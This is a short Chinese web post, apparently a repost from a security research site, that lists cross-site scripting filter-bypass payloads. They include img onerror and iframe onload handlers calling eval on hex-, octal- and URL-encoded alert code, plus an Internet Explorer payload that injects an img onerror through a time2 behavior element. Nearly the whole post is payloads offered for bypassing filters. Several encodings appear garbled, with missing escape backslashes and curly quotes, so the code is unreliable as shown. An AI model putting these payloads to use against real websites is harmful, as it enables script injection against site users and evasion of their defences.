几个bypass如下:
1
|
<img src=“5″ onerror=eval(“alert(‘lalala~’)”)></img>
|
变形如:
1
|
%3Cimg%20src=%225%22%20onerror=eval%28%22x61x6cx65x72x74x28x27x78x73x73x27x29%22%29%3E%3C/img%3E
|
利用Hex 编码,加上img 的错误事件 用eval 函数 操控()内的代码
1
|
<iframe onload=eval(“alert(’1′)”)></iframe>
|
变形如:
1
|
<iframe onload=eval(“1411541451621645047614751″)></iframe>
|
通过iframe,转换为16进制或8进制都可行
接下来这个是针对IE的:
1
2
3
4
|
<div id=x>x</div>
<xml:namespace prefix=t>
<import namespace=t implementation=%23default%23time2>
<t:set/attributename=innerHTML targetElement=x to=%26lt;img%26%2311;src=x:x%26%2311;onerror%26%2311;=alert%26%23×28;1%26%23×29;%26gt;>
|
link:http://www.fuckgcd.net/wordpress/archives/153
本文由网络安全攻防研究室(www.91ri.org)信息安全小组收集整理,转载请注明出处。
Copyright © hongdaChiaki. All Rights Reserved. 鸿大千秋 版权所有
联系方式:
地址: 深圳市南山区招商街道沿山社区沿山路43号创业壹号大楼A栋107室
邮箱:service@hongdaqianqiu.com
备案号:粤ICP备15078875号